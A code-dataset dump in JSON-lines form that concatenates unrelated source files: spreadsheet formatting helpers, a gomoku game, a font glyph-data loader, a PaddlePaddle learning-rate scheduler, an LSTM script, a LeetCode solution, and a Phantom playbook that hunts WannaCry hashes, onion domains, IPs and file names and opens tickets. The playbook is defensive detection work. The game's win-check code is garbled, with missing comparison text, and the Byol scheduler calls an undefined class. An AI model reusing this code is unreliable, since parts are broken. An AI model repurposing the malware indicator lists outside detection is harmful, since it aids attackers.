num_format:\n fm.set_num_format(num_format=num_format)\n if font_color:\n fm.set_color(font_color=font_color)\n if bg_color:\n fm.set_bg_color(bg_color=bg_color)\n return fm\n\n @staticmethod\n def get_cell_str(line_idx, col_idx):\n return \"{0}{1}\".format(COLH[col_idx], line_idx+1)\n\n def get_condition_formula(self, sheet, column, line_start, line_end, value):\n range_start = self.get_cell_str(line_idx=line_start, col_idx=column)\n range_end = self.get_cell_str(line_idx=line_end, col_idx=column)\n return \"\\'{sheet_name}\\'!{range_start}:{range_end},{value}\".format(sheet_name=sheet,\n range_start=range_start,\n range_end=range_end,\n value=value)\n\n def get_range_formula(self, sheet, column, line_start, line_end):\n range_start = self.get_cell_str(line_idx=line_start, col_idx=column)\n range_end = self.get_cell_str(line_idx=line_end, col_idx=column)\n return \"\\'{sheet_name}\\'!{range_start}:{range_end}\".format(sheet_name=sheet,\n range_start=range_start,\n range_end=range_end)\n\n @staticmethod\n def get_accuracy_formula(errors_cell, total_cell):\n return \"=1-{errors}/{total}\".format(errors=errors_cell, total=total_cell)\n\n @staticmethod\n def get_count_formula(conditions_string):\n return \"=SUM(COUNTIFS({conditions}))\".format(conditions=conditions_string)\n\n @staticmethod\n def get_sum_formula(range_string, conditions_string):\n return \"=SUM(SUMIFS({range},{conditions}))\".format(range=range_string,\n conditions=conditions_string)\n\n @staticmethod\n def get_variance_formula(first_cell, second_cell):\n return \"={first}-{second}\".format(first=first_cell, second=second_cell)\n\n def add_format_for_variant_cell(self, worksheet, cell, is_increase_is_positive, in_percent):\n if is_increase_is_positive:\n positive_criteria = \">\"\n negative_criteria = \"<\"\n else:\n positive_criteria = \"<\"\n negative_criteria = \">\"\n\n worksheet.conditional_format(cell, {\n 'type': 'cell',\n 'criteria': positive_criteria,\n 'value': 0,\n 'format': self.get_format_for_variant(True, in_percent)\n })\n\n worksheet.conditional_format(cell, {\n 'type': 'cell',\n 'criteria': negative_criteria,\n 'value': 0,\n 'format': self.get_format_for_variant(False, in_percent)\n })\n\n def get_format_for_variant(self, is_positive, percent_format):\n positive_acc_format_in_percent = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n num_format='0.00%',\n font_color=Color.GREEN,\n bg_color=Color.LIGHT_GREEN)\n negative_acc_format_in_percent = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.RED,\n num_format='0.00%',\n bg_color=Color.LIGHT_ORANGE)\n positive_acc_format_in_number = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.GREEN,\n num_format='#,##0',\n bg_color=Color.LIGHT_GREEN)\n negative_acc_format_in_number = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.RED,\n num_format='#,##0',\n bg_color=Color.LIGHT_ORANGE)\n if percent_format:\n if is_positive:\n return positive_acc_format_in_percent\n else:\n return negative_acc_format_in_percent\n else:\n if is_positive:\n return positive_acc_format_in_number\n else:\n return negative_acc_format_in_number\n\n def add_format_for_negative_cell_by_value(self, worksheet, cell, value,\n is_increase_is_negative,\n in_percent):\n \"\"\"\n Add format for cell with condition is cell value\n\n Parameters\n ----------\n worksheet: worksheet working on.\n cell: current cell\n value: specific value\n in_percent\n\n Returns\n -------\n\n \"\"\"\n if is_increase_is_negative:\n negative_criteria = \">\"\n positive_criteria = \"<\"\n else:\n negative_criteria = \"<\"\n positive_criteria = \">\"\n\n worksheet.conditional_format(cell, {\n 'type': 'cell',\n 'criteria': negative_criteria,\n 'value': value,\n 'format': self.get_format_for_negative_cell_by_value(False, in_percent)\n })\n worksheet.conditional_format(cell, {\n 'type': 'cell',\n 'criteria': positive_criteria,\n 'value': value,\n 'format': self.get_format_for_negative_cell_by_value(True,\n in_percent)\n })\n\n def get_format_for_negative_cell_by_value(self, is_positive, percent_format):\n negative_format_in_percent = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.RED,\n num_format='0.00%')\n positive_format_in_percent = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.BLACK,\n num_format='0.00%')\n negative_format_in_number = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.RED,\n num_format='#,##0')\n\n positive_format_in_number = self.get_cell_format(set_border=True,\n align=Align.RIGHT,\n font_color=Color.BLACK,\n num_format='#,##0')\n if percent_format:\n if is_positive:\n return positive_format_in_percent\n else:\n return negative_format_in_percent\n else:\n if is_positive:\n return positive_format_in_number\n else:\n return negative_format_in_number\n","sub_path":"utilities/report/lib_base/xlsx_reporter.py","file_name":"xlsx_reporter.py","file_ext":"py","file_size_in_byte":11712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"591245123","text":"import numpy as np\nimport constant as c\nimport copy\n\n# board: 1 means black -1 means white 0 means nothing\n# player: BLACK/WHITE player's turn\n# game_history allows player to go back\nclass Game(object):\n def __init__(self):\n self.board = np.zeros((c.SIZE, c.SIZE))\n self.player = c.BLACK_P\n self.game_history = []\n self.mode = 0 #0=uninitialized, 1=pvai, 2=aivp, 3=pvp, 4=aivsai\n self.finish = 0 #0=not finish, 1=BLACK WIN, 2=WHITE WIN\n\n # return True if legal, False if illegal\n def move(self, pos, record=True):\n # if game ended, cannot precede\n if self.finish:\n return False\n\n # otherwise place stone\n x, y = pos\n if self.board[x,y] != 0:\n return True\n if record:\n state = (np.copy(self.board), self.player)\n self.game_history.append(state)\n # place piece\n self.board[x,y] = self.player\n self.finish = self.check_win(pos)\n # switch player if no winner\n if self.finish == 0: self.player = -self.player\n return False\n\n def check_win(self, pos):\n x,y = pos\n row = self.board[x,:]\n col = self.board[:,y]\n diag1, diag2 = [], []\n for off in range(-4, 5):\n if x+off>=0 and x+off=0 and y+off=0 and x+off=0 and y-off= 5: return 1\n elif longest <= -5: return -1\n return 0\n\n def go_back(self, step_size=1):\n for i in range(step_size):\n state = self.game_history.pop()\n self.board, self.player = state\n self.finish = 0\n\n def get_msg(self):\n if self.mode == 0:\n return [('BLACK', c.BLACK), ('WHITE', c.WHITE), ('PVP', c.RED), ('AI', c.GREEN)]\n if self.mode==1 or self.mode==2 or self.mode==3:\n return [('GO BACK', c.BLACK), ('CONCEDE', c.RED), ('RESTART', c.GREEN)]\n else:\n return []\n\n def get_button(self, button):\n if self.mode==0 and button>=1 and button<=4:\n self.mode = button\n return\n # if click \"go back button\"\n if (self.mode == 1 or self.mode == 2):\n if (button==1 and len(self.game_history)>=2): self.go_back(2)\n if self.mode == 3:\n if (button==1 and len(self.game_history)>=1): self.go_back(1)\n # if click \"restart button\"\n if self.mode>=1 and self.mode<=3 and button == 3:\n self.__init__()\n # if click \"concede button\"\n if self.mode>=1 and self.mode<=3 and button == 2 and self.finish==0:\n self.finish = -self.player\n","sub_path":"src/game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"285251511","text":"\"\"\"Json reader for glyph data dictionaries and individual\nglyph data dictionaries.\"\"\"\nimport os\nimport json\n\n\ndef _glyph_data(json_file):\n \"\"\"Load json glyph data files. Json should be structured in the\n following manner:\n [\n {\n \"name\": \"endash\",\n \"unicode\": 8211,\n \"contours\": [\n 1\n ]\n },\n {\n \"name\": \"emdash\",\n \"unicode\": 8212,\n \"contours\": [\n 1\n ]\n },\n ]\n\n \"name\" and \"unicode \"are compulsory keys which should be included in\n all glyph data files.\n\n \"unicode\" is an integer instead of a hex so it matches TTFont's cmap\n table key.\n \"\"\"\n glyphs = {}\n with open(json_file, 'r') as glyph_data:\n glyph_data = json.loads(glyph_data.read())\n for glyph in glyph_data:\n glyphs[glyph['unicode']] = glyph\n return glyphs\n\n\npath = os.path.dirname(__file__)\n\n# The desired_glyph_data.json file contains the 'recommended' countour count\n# for encoded glyphs. The contour counts are derived from fonts which were\n# chosen for their quality and unique design decisions for particular glyphs.\n\n# Why make this?\n# Visually QAing thousands of glyphs by hand is tiring. Most glyphs can only\n# be constructured in a handful of ways. This means a glyph's contour count\n# will only differ slightly amongst different fonts, e.g a 'g' could either\n# be 2 or 3 contours, depending on whether its double story or single story.\n# However, a quotedbl should have 2 contours, unless the font belongs to a\n# display family.\n\n# In the future, additional glyph data can be included. A good addition would\n# be the 'recommended' anchor counts for each glyph.\ndesired_glyph_data_path = os.path.join(path, 'desired_glyph_data.json')\ndesired_glyph_data = _glyph_data(desired_glyph_data_path)\n","sub_path":"Lib/fontbakery/glyphdata.py","file_name":"glyphdata.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"380337682","text":"\r\nimport json\r\nimport urllib.request\r\n\r\n\r\nUserList=['elmiram', 'maryszmary', 'lizaku', 'nevmenandr', 'ancatmara', 'roctbb', 'akutuzov', 'agricolamz',\r\n 'lehkost', 'kylepjohnson', 'mikekestemont', 'demidovakatya', 'shwars', 'JelteF', 'timgraham', 'arogozhnikov',\r\n 'jasny', 'bcongdon', 'whyisjake', 'gvanrossum']\r\n\r\nprint ('Здравствуйте. Список репозиториев какого пользователя вы бы хотели посмотреть?')\r\nusername = input()\r\n\r\nif username not in UserList: \r\n print ('Выберите, пожалуйста, кого-то из этого списка:elmiram,maryszmary, lizaku, nevmenandr, ancatmara, roctbb, akutuzov,agricolamz, lehkost, kylepjohnson, mikekestemont, demidovakatya, shwars,JelteF, timgraham, arogozhnikov, jasny, bcongdon, whyisjake, gvanrossum') \r\n\r\n \r\nurl = 'https://api.github.com/users/%s/repos' % username \r\n\r\n\r\nresponse = urllib.request.urlopen(url) \r\ntext = response.read().decode('utf-8') \r\ndata= json.loads(text)\r\n\r\n\r\nprint('У этого пользователя' + ' ' + str(len(data))+ ' ' + 'репозиториев.')\r\n\r\n\r\ndef repos(data):\r\n for i in data:\r\n print(\"Такой: \" + i[\"name\"])\r\nrepos(data)\r\n\r\ndef description(data):\r\n for i in data:\r\n print(\"Описание:\" + str(i[\"description\"]))\r\ndescription(data)\r\n\r\n\r\ndef languages(data):\r\n dict_lang = {}\r\n for i in data:\r\n new_1 = i['language']\r\n if new_1 in dict_lang:\r\n dict_lang[new_1]+=1\r\n else:\r\n dict_lang[new_1] = 1\r\n for lang in dict_lang.keys():\r\n print(lang, dict_lang[lang])\r\nlanguages(data)\r\n","sub_path":"hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"405608845","text":"# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport math\nimport paddle\n\nfrom paddle.optimizer.lr import LRScheduler\nfrom .builder import LRSCHEDULERS, build_lr_scheduler\nclass CosinLinearWarmup(LRScheduler):\n def __init__(self,\n learning_rate,\n T_max,\n warmup_steps,\n start_lr,\n end_lr,\n last_epoch=-1,\n verbose=False):\n type_check = isinstance(learning_rate, float) or isinstance(\n learning_rate, int) or isinstance(learning_rate, LRScheduler)\n if not type_check:\n raise TypeError(\n \"the type of learning_rate should be [int, float or LRScheduler], the current type is {}\".\n format(learning_rate))\n self.learning_rate = learning_rate\n self.T_max = T_max\n self.warmup_steps = warmup_steps\n self.start_lr = start_lr\n self.end_lr = end_lr\n assert end_lr > start_lr, \"end_lr {} must be greater than start_lr {}\".format(\n end_lr, start_lr)\n super(CosinLinearWarmup, self).__init__(start_lr, last_epoch, verbose)\n\n def state_dict(self):\n \"\"\"\n Returns the state of the LinearWarmup scheduler as a :class:`dict`.\n\n It is a subset of ``self.__dict__`` .\n \"\"\"\n state_dict = super(CosinLinearWarmup, self).state_dict()\n if isinstance(self.learning_rate, LRScheduler):\n state_dict[\"LinearWarmup_LR\"] = self.learning_rate.state_dict()\n return state_dict\n\n def set_state_dict(self, state_dict):\n \"\"\"\n Loads state_dict for LinearWarmup scheduler.\n \"\"\"\n super(CosinLinearWarmup, self).set_state_dict(state_dict)\n if isinstance(self.learning_rate, LRScheduler):\n self.learning_rate.set_state_dict(state_dict[\"LinearWarmup_LR\"])\n\n def get_lr(self):\n if self.last_epoch < self.warmup_steps:\n return (self.end_lr - self.start_lr) * float(\n self.last_epoch) / float(self.warmup_steps) + self.start_lr\n else:\n if isinstance(self.learning_rate, LRScheduler):\n lr_value = self.learning_rate()\n self.learning_rate.step()\n return lr_value\n return self.learning_rate * 0.5 * (1 + math.cos(math.pi * (self.last_epoch-self.warmup_steps) / self.T_max))\n\n\n\n\nclass ByolLRScheduler(CosinLinearWarmup):\n def __init__(self,total_image,total_batch,total_steps,warmup_steps,start_lr,end_lr,last_epoch=-1,verbose=False):\n total_steps = total_steps * total_image // total_batch\n warmup_steps = warmup_steps * total_image // total_batch\n T_max = total_steps - warmup_steps\n super(CosinWarmup, self).__init__(end_lr,T_max,warmup_steps,start_lr,end_lr,last_epoch=-1,verbose=False)\n","sub_path":"passl/solver/byol_lr_scheduler.py","file_name":"byol_lr_scheduler.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"581494157","text":"from keras.layers import LSTM\nimport numpy as np\nimport cPickle\nimport os\nfrom keras.models import Sequential\nimport data_loader as dl\nfrom keras.layers import Dense\nfrom keras.layers import Masking\nfrom keras.layers.wrappers import TimeDistributed\nfrom keras.preprocessing.sequence import pad_sequences\n\nresults_dir = os.environ.get('MINF_RESULTS_DIR')\n\nnp.random.seed(42)\n\ndata = dl.DataLoader()\n\nX, Y, m = data.load()\n\nX_pad = pad_sequences(X, maxlen=m, padding='post')\nY_pad = pad_sequences(Y, maxlen=m, padding='post')\n\nnp.random.shuffle(X_pad)\nnp.random.shuffle(Y_pad)\n\nsample_weights = np.ones((273, m))\nfor i in xrange(273):\n for j in xrange(m):\n if (X_pad[i][j] == np.zeros(12)).all():\n sample_weights[i][j] = 0\n\nmodel = Sequential()\naccuracies = dict()\n# Just do once, can't be bothered removing loop\nfor i in [1]:\n mask = np.zeros(12)\n model.add(Masking(mask_value=mask, input_shape=(m, 12)))\n model.add(LSTM(100, return_sequences=True, dropout_W=0.4, dropout_U=0.4))\n model.add(TimeDistributed(Dense(12, activation=\"softmax\")))\n model.compile(optimizer='rmsprop',\n loss='categorical_crossentropy',\n sample_weight_mode='temporal')\n X_train, X_test = X_pad[:136, :], X_pad[136:, :]\n Y_train, Y_test = Y_pad[:136, :], Y_pad[136:, :]\n sample_weights_train, sample_weights_test = sample_weights[:136, :], sample_weights[136:, :]\n # # for custom metrics\n # def weighted_accuracy(y_true, y_pred):\n # score_array *= sample_weights\n # score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))\n\n def weighted_accuracy(y_true, y_pred):\n # Only for testing\n # score_array = K.equal(K.argmax(y_true, axis=-1),\n # K.argmax(y_pred, axis=-1))\n # score_array *= weights\n # score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))\n # return K.mean(score_array)\n total = 0.0\n count = 0.0\n for i, y_i in enumerate(y_true):\n for j, y_ij in enumerate(y_i):\n if sum(y_ij) > 0:\n total += y_ij[y_pred[i][j]]\n count += 1\n return total / count\n history = model.fit(X_train, Y_train, batch_size=136, nb_epoch=500, sample_weight=sample_weights_train)\n Y_prediction = model.predict_classes(X_test, batch_size=5)\n acc = weighted_accuracy(Y_test, Y_prediction), history.history\n\n with open(os.path.join(results_dir, 'LSTM-shuffle-gpu.pkl'), 'w') as f:\n cPickle.dump(acc, f)\n","sub_path":"src/seq2seq/wjazz/LSTM-shuffle.py","file_name":"LSTM-shuffle.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"609609483","text":"'''\nA tree is an undirected graph in which any two vertices are connected by exactly one path. In other words, any connected graph without simple cycles is a tree.\n\nGiven a tree of n nodes labelled from 0 to n - 1, and an array of n - 1 edges where edges[i] = [ai, bi] indicates that there is an undirected edge between the two nodes ai and bi in the tree, you can choose any node of the tree as the root. When you select a node x as the root, the result tree has height h. Among all possible rooted trees, those with minimum height (i.e. min(h)) are called minimum height trees (MHTs).\n\nReturn a list of all MHTs' root labels. You can return the answer in any order.\n\nThe height of a rooted tree is the number of edges on the longest downward path between the root and a leaf.\n\n \n\nExample 1:\n\n\nInput: n = 4, edges = [[1,0],[1,2],[1,3]]\nOutput: [1]\nExplanation: As shown, the height of the tree is 1 when the root is the node with label 1 which is the only MHT.\nExample 2:\n\n\nInput: n = 6, edges = [[3,0],[3,1],[3,2],[3,4],[5,4]]\nOutput: [3,4]\n'''\nfrom typing import List\nfrom collections import defaultdict\nclass Solution:\n #reversed bfs by level order, remove all leaves by level till last one or two nodes \n def findMinHeightTrees(self, n: int, edges: List[List[int]]) -> List[int]:\n if n == 1:\n return [0]\n adj = defaultdict(set)\n for a, b in edges:\n adj[a].add(b)\n adj[b].add(a)\n leaves = [node for node, neighbours in adj.items() if len(neighbours) == 1]\n while len(adj) > 2:\n next_leaves = []\n for leaf in leaves:\n parent = adj[leaf].pop()\n del adj[leaf]\n adj[parent].remove(leaf)\n if len(adj[parent]) == 1:\n next_leaves.append(parent)\n leaves = next_leaves\n return leaves\n\nimport unittest\nfunctions = [Solution().__getattribute__(f) for f in dir(Solution()) if not f.startswith('__')]\nclass Test(unittest.TestCase): \n def test1(self):\n for f in functions:\n self.assertEqual(f(n = 2, edges = [[1,0]]), [1,0], f.__name__)\n def test2(self):\n for f in functions:\n self.assertEqual(f(n = 3, edges = [[0,1],[0,2]]), [0], f.__name__)\n def test3(self):\n for f in functions:\n self.assertEqual(f(n = 4, edges = [[1,0],[1,2],[1,3]]), [1], f.__name__)\n def test4(self):\n for f in functions:\n self.assertEqual(f(n = 6, edges = [[3,0],[3,1],[3,2],[3,4],[5,4]]), [3,4], f.__name__)\nunittest.main()","sub_path":"leetcode/LC310. Minimum Height Trees.py","file_name":"LC310. Minimum Height Trees.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"540159970","text":"\"\"\"\nHunt for wannacry IOCs (maintained in an external custom list) file, domain, and IP indicators in network and create tickets.\n\"\"\"\n\nimport phantom.rules as phantom\nimport json\nfrom datetime import datetime, timedelta\ndef on_start(container):\n phantom.debug('on_start() called')\n\n domains = phantom.datastore_get('wannacry_domains')\n if len(domains) == 0:\n phantom.datastore_set('wannacry_domains',\n [ 'iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com',\n 'Rphjmrpwmfv6v2e.onion',\n 'Gx7ekbenv2riucmf.onion',\n '57g7spgrzlojinas.onion',\n 'xxlvbrloxvriy2c5.onion',\n '76jdd2ir2embyv47.onion',\n 'cwwnhwhlz52maqm7.onion',\n ] )\n\n hashes = phantom.datastore_get('wannacry_hashes')\n if len(hashes) == 0:\n phantom.datastore_set('wannacry_hashes', \n [ 'dff26a9a44baa3ce109b8df41ae0a301d9e4a28ad7bd7721bbb7ccd137bfd696',\n '201f42080e1c989774d05d5b127a8cd4b4781f1956b78df7c01112436c89b2c9',\n 'ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa',\n 'c365ddaa345cfcaff3d629505572a484cff5221933d68e4a52130b8bb7badaf9',\n '09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa',\n 'b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25',\n 'aae9536875784fe6e55357900519f97fee0a56d6780860779a36f06765243d56',\n '21ed253b796f63b9e95b4e426a82303dfac5bf8062bfe669995bde2208b360fd',\n '2372862afaa8e8720bc46f93cb27a9b12646a7cbc952cc732b8f5df7aebb2450',\n '24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c',\n 'f8812f1deb8001f3b7672b6fc85640ecb123bc2304b563728e6235ccbe782d85',\n '4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79',\n '4b76e54de0243274f97430b26624c44694fbde3289ed81a160e0754ab9f56f32',\n '9cc32c94ce7dc6e48f86704625b6cdc0fda0d2cd7ad769e4d0bb1776903e5a13',\n '78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df',\n 'be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844',\n '5d26835be2cf4f08f2beeff301c06d05035d0a9ec3afacc71dff22813595c0b9',\n '76a3666ce9119295104bb69ee7af3f2845d23f40ba48ace7987f79b06312bbdf',\n 'fc626fe1e0f4d77b34851a8c60cdd11172472da3b9325bfe288ac8342f6c710a',\n 'eeb9cd6a1c4b3949b2ff3134a77d6736b35977f951b9c7c911483b5caeb1c1fb',\n '043e0d0d8b8cda56851f5b853f244f677bd1fd50f869075ef7ba1110771f70c2',\n '57c12d8573d2f3883a8a0ba14e3eec02ac1c61dee6b675b6c0d16e221c3777f4',\n 'ca29de1dc8817868c93e54b09f557fe14e40083c0955294df5bd91f52ba469c8',\n 'f7c7b5e4b051ea5bd0017803f40af13bed224c4b0fd60b890b6784df5bd63494',\n '3e6de9e2baacf930949647c399818e7a2caea2626df6a468407854aaa515eed9',\n '9b60c622546dc45cca64df935b71c26dcf4886d6fa811944dbc4e23db9335640',\n '5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec',\n '24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c',\n '12d67c587e114d8dde56324741a8f04fb50cc3160653769b8015bc5aec64d20b',\n '85ce324b8f78021ecfc9b811c748f19b82e61bb093ff64f2eab457f9ef19b186',\n '3f3a9dde96ec4107f67b0559b4e95f5f1bca1ec6cb204bfe5fea0230845e8301',\n 'aee20f9188a5c3954623583c6b0e6623ec90d5cd3fdec4e1001646e27664002c',\n ] )\n\n file_names = phantom.datastore_get('wannacry_file_names')\n if len(file_names) == 0:\n phantom.datastore_set('wannacry_file_names', \n [ '@Please_Read_Me@.txt',\n '@WanaDecryptor@.exe',\n '@WanaDecryptor@.exe.lnk',\n 'Please Read Me!.txt',\n 'tasksche.exe',\n 'qeriuwjhrf',\n '131181494299235.bat',\n '176641494574290.bat',\n '217201494590800.bat',\n '!WannaDecryptor!.exe.lnk',\n '00000000.pky',\n '00000000.eky',\n '00000000.res',\n 'taskdl.exe',\n ] )\n\n ip_addrs = phantom.datastore_get('wannacry_ip_addrs')\n if len(ip_addrs) == 0:\n phantom.datastore_set('wannacry_ip_addrs', \n [ '197.231.221.221',\n '128.31.0.39',\n '149.202.160.69',\n '46.101.166.19',\n '91.121.65.179',\n '2.3.69.209',\n '146.0.32.144',\n '50.7.161.218',\n '217.79.179.177',\n '213.61.66.116',\n '212.47.232.237',\n '81.30.158.223',\n '79.172.193.32',\n '38.229.72.16',\n ] )\n\n # call 'hunt_file_1' block\n hunt_file_1(container=container)\n\n # call 'list_endpoints_1' block\n list_endpoints_1(container=container)\n\n return\n\ndef filter_7(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('filter_7() called')\n\n # collect filtered artifact ids for 'if' condition 1\n matched_artifacts_1, matched_results_1 = phantom.condition(\n container=container,\n action_results=results,\n conditions=[\n [\"list_endpoints_1:action_result.data.*.ips\", \"not in\", \"custom_list:wannacry_infected_endpoints\"],\n ],\n name=\"filter_7:condition_1\")\n\n # call connected blocks if filtered artifacts or results\n if matched_artifacts_1 or matched_results_1:\n list_connections_1(action=action, success=success, container=container, results=results, handle=handle, custom_function=custom_function, filtered_artifacts=matched_artifacts_1, filtered_results=matched_results_1)\n\n return\n\ndef create_ticket_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('create_ticket_1() called')\n \n #phantom.debug('Action: {0} {1}'.format(action['name'], ('SUCCEEDED' if success else 'FAILED')))\n \n # collect data for 'create_ticket_1' call\n formatted_data_1 = phantom.get_format_data(name='format_ticket_description')\n\n parameters = []\n \n # build parameters list for 'create_ticket_1' call\n parameters.append({\n 'table': \"incident\",\n 'fields': \"\",\n 'vault_id': \"\",\n 'description': formatted_data_1,\n 'short_description': \"Wanna Cry Hunting Campaign Result\",\n })\n\n phantom.act(action=\"create ticket\", parameters=parameters, assets=['servicenow'], name=\"create_ticket_1\")\n\n return\n\ndef list_connections_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('list_connections_1() called')\n \n #phantom.debug('Action: {0} {1}'.format(action['name'], ('SUCCEEDED' if success else 'FAILED')))\n \n # collect data for 'list_connections_1' call\n results_data_1 = phantom.collect2(container=container, datapath=['list_endpoints_1:action_result.data.*.ips', 'list_endpoints_1:action_result.parameter.context.artifact_id'], action_results=results)\n\n parameters = []\n \n # build parameters list for 'list_connections_1' call\n for results_item_1 in results_data_1:\n parameters.append({\n 'pid': \"\",\n 'ip_hostname': results_item_1[0],\n 'process_name': \"\",\n 'carbonblack_process_id': \"\",\n # context (artifact id) is added to associate results with the artifact\n 'context': {'artifact_id': results_item_1[1]},\n })\n\n phantom.act(action=\"list connections\", parameters=parameters, assets=['carbonblack'], callback=filter_matching_IP, name=\"list_connections_1\")\n\n return\n\ndef list_endpoints_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('list_endpoints_1() called')\n\n parameters = []\n\n phantom.act(action=\"list endpoints\", parameters=parameters, assets=['carbonblack'], callback=filter_7, name=\"list_endpoints_1\")\n\n return\n\ndef get_system_info_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('get_system_info_1() called')\n \n #phantom.debug('Action: {0} {1}'.format(action['name'], ('SUCCEEDED' if success else 'FAILED')))\n \n # collect data for 'get_system_info_1' call\n results_data_1 = phantom.collect2(container=container, datapath=['hunt_file_1:action_result.data.*.process.results.*.sensor_id', 'hunt_file_1:action_result.parameter.context.artifact_id'], action_results=results)\n\n parameters = []\n \n # build parameters list for 'get_system_info_1' call\n for results_item_1 in results_data_1:\n parameters.append({\n 'sensor_id': results_item_1[0],\n 'ip_hostname': \"\",\n # context (artifact id) is added to associate results with the artifact\n 'context': {'artifact_id': results_item_1[1]},\n })\n\n phantom.act(action=\"get system info\", parameters=parameters, assets=['carbonblack'], callback=filter_6, name=\"get_system_info_1\", parent_action=action)\n\n return\n\ndef hunt_file_1(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('hunt_file_1() called')\n\n # get custom list for wannacry_hashes\n cl_wannacry_hashes = phantom.datastore_get('wannacry_hashes')\n\n parameters = []\n \n # build parameters list for 'hunt_file_1' call\n for wannacry_hash in cl_wannacry_hashes:\n if wannacry_hash:\n parameters.append({\n 'hash': wannacry_hash,\n 'range': \"\",\n 'type': \"\",\n })\n\n phantom.act(\"hunt file\", parameters=parameters, assets=['carbonblack'], callback=get_system_info_1, name=\"hunt_file_1\") \n \n return\n\ndef filter_matching_IP(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('filter_matching_IP() called')\n\n # collect filtered artifact ids for 'if' condition 1\n matched_artifacts_1, matched_results_1 = phantom.condition(\n container=container,\n action_results=results,\n conditions=[\n [\"list_connections_1:action_result.data.*.ip_addr\", \"in\", \"custom_list:wannacry_ip_addrs\"],\n ],\n name=\"filter_matching_IP:condition_1\")\n\n # call connected blocks if filtered artifacts or results\n if matched_artifacts_1 or matched_results_1:\n join_format_ticket_description(action=action, success=success, container=container, results=results, handle=handle, custom_function=custom_function, filtered_artifacts=matched_artifacts_1, filtered_results=matched_results_1)\n\n return\n\ndef filter_6(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('filter_6() called')\n\n # collect filtered artifact ids for 'if' condition 1\n matched_artifacts_1, matched_results_1 = phantom.condition(\n container=container,\n action_results=results,\n conditions=[\n [\"get_system_info_1:action_result.data.*.ips\", \"not in\", \"custom_list:wannacry_infected_endpoints\"],\n ],\n name=\"filter_6:condition_1\")\n\n # call connected blocks if filtered artifacts or results\n if matched_artifacts_1 or matched_results_1:\n join_format_ticket_description(action=action, success=success, container=container, results=results, handle=handle, custom_function=custom_function, filtered_artifacts=matched_artifacts_1, filtered_results=matched_results_1)\n\n return\n\n\"\"\"\nList the IP addresses and file hashes in a formatted paragraph for the ticket description.\n\"\"\"\ndef format_ticket_description(action=None, success=None, container=None, results=None, handle=None, filtered_artifacts=None, filtered_results=None, custom_function=None, **kwargs):\n phantom.debug('format_ticket_description() called')\n \n template = \"\"\"The following endpoints have active connections with IP addresses associated with wannacry: \n{0}\n\nThe following endpoints have a wannacry fileHash present on their system: \n{1}\"\"\"\n\n # parameter list for template variable replacement\n parameters = [\n \"filtered-data:filter_matching_IP:condition_1:list_connections_1:action_result.data.*.hostname\",\n \"hunt_file_1:action_result.data.*.process.results.*.hostname\",\n ]\n\n phantom.format(container=container, template=template, parameters=parameters, name=\"format_ticket_description\")\n\n create_ticket_1(container=container)\n\n 